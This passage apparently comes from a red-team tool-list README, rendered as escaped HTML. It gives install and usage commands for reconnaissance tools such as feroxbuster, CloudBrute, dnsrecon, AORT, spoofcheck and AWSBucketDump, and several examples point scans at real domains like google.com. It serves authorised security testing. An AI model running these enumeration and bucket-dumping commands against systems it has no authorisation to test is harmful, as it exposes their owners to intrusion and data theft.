\u0026quot;https://google.com\u0026quot; -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20\"\u003e\u003cpre\u003egobuster dir -u \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://google.com\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/epi052/feroxbuster\"\u003eferoxbuster\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-feroxbuster\" class=\"anchor\" aria-label=\"Permalink: 🔙feroxbuster\" href=\"#feroxbuster\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Kali)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt update \u0026amp;\u0026amp; sudo apt install -y feroxbuster\"\u003e\u003cpre\u003esudo apt update \u003cspan class=\"pl-k\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e sudo apt install -y feroxbuster\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Mac)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash\"\u003e\u003cpre\u003ecurl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e bash\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Windows)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip\nExpand-Archive .\\feroxbuster.zip\n.\\feroxbuster\\feroxbuster.exe -V\"\u003e\u003cpre\u003eInvoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip\nExpand-Archive .\u003cspan class=\"pl-cce\"\u003e\\f\u003c/span\u003eeroxbuster.zip\n.\u003cspan class=\"pl-cce\"\u003e\\f\u003c/span\u003eeroxbuster\u003cspan class=\"pl-cce\"\u003e\\f\u003c/span\u003eeroxbuster.exe -V\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full installation instructions see \u003ca href=\"https://epi052.github.io/feroxbuster-docs/docs/installation/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url\n./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx\n\n# Scan with headers\n./feroxbuster -u http://127.1 -H Accept:application/json \u0026quot;Authorization: Bearer {token}\u0026quot;\n\n# Read URLs from stdin\ncat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files\n\n# Proxy requests through burpsuite\n./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url\u003c/span\u003e\n./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan with headers\u003c/span\u003e\n./feroxbuster -u http://127.1 -H Accept:application/json \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eAuthorization: Bearer {token}\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Read URLs from stdin\u003c/span\u003e\ncat targets \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e fff -s 200 -o js-files\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Proxy requests through burpsuite\u003c/span\u003e\n./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/).\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eFull usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/).\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif\" rel=\"nofollow\"\u003ehttps://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/0xsha/CloudBrute\"\u003eCloudBrute\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-cloudbrute\" class=\"anchor\" aria-label=\"Permalink: 🔙CloudBrute\" href=\"#cloudbrute\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeatures:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eCloud detection (IPINFO API and Source Code)\u003c/li\u003e\n\u003cli\u003eFast (concurrent)\u003c/li\u003e\n\u003cli\u003eCross Platform (windows, linux, mac)\u003c/li\u003e\n\u003cli\u003eUser-Agent Randomization\u003c/li\u003e\n\u003cli\u003eProxy Randomization (HTTP, Socks5)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDownload the latest \u003ca href=\"https://github.com/0xsha/CloudBrute/releases\"\u003erelease\u003c/a\u003e for your system and follow the usage.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'\nCloudBrute -d target.com -k target -m storage -t 80 -T 10 -w \u0026quot;./data/storage_small.txt\u0026quot;\n\n# Output results to file\nCloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'\u003c/span\u003e\nCloudBrute -d target.com -k target -m storage -t 80 -T 10 -w \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e./data/storage_small.txt\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Output results to file\u003c/span\u003e\nCloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/0xsha/CloudBrute\"\u003ehttps://github.com/0xsha/CloudBrute\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://www.kali.org/tools/dnsrecon/#dnsrecon\" rel=\"nofollow\"\u003ednsrecon\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-dnsrecon\" class=\"anchor\" aria-label=\"Permalink: 🔙dnsrecon\" href=\"#dnsrecon\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ednsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install dnsrecon\"\u003e\u003cpre\u003esudo apt install dnsrecon\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"dnsrecon -d google.com\"\u003e\u003cpre\u003ednsrecon -d google.com\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://www.shodan.io/dashboard\" rel=\"nofollow\"\u003eshodan.io\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-shodanio\" class=\"anchor\" aria-label=\"Permalink: 🔙shodan.io\" href=\"#shodanio\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eShodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/D3Ext/AORT\"\u003eAORT\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-aort\" class=\"anchor\" aria-label=\"Permalink: 🔙AORT\" href=\"#aort\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/D3Ext/AORT\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e AORT\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e pip3 install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 AORT.py -d google.com\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s1\"\u003epython3\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003eAORT\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003epy\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ed\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003egoogle\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003ecom\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/BishopFox/spoofcheck\"\u003espoofcheck\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-spoofcheck\" class=\"anchor\" aria-label=\"Permalink: 🔙spoofcheck\" href=\"#spoofcheck\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDomains are spoofable if any of the following conditions are met:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eLack of an SPF or DMARC record\u003c/li\u003e\n\u003cli\u003eSPF record never specifies \u003ccode\u003e~all\u003c/code\u003e or \u003ccode\u003e-all\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDMARC policy is set to \u003ccode\u003ep=none\u003c/code\u003e or is nonexistent\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/BishopFox/spoofcheck\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e spoofcheck\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e pip install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./spoofcheck.py [DOMAIN]\"\u003e\u003cpre\u003e./spoofcheck.py [DOMAIN]\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/jordanpotti/AWSBucketDump\"\u003eAWSBucketDump\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-awsbucketdump\" class=\"anchor\" aria-label=\"Permalink: 🔙AWSBucketDump\" href=\"#awsbucketdump\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]\n\noptional arguments:\n -h, --help show this help message and exit\n -D Download files. This requires significant diskspace\n -d If set to 1 or True, create directories for each host w/ results\n -t THREADS number of threads\n -l HOSTLIST\n -g GREPWORDS Provide a wordlist to grep for\n -m MAXSIZE Maximum file size to download.\n\n python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eusage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]\n\noptional arguments:\n -h, --help show this help message and exit\n -D Download files. This requires significant diskspace\n -d If set to 1 or True, create directories for each host w/ results\n -t THREADS number of threads\n -l HOSTLIST\n -g GREPWORDS Provide a wordlist to grep for\n -m MAXSIZE Maximum file size to download.\n\n python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/metac0rtex/GitHarvester\"\u003eGitHarvester\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-githarvester\" class=\"anchor\" aria-label=\"Permalink: 🔙GitHarvester\" href=\"#githarvester\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 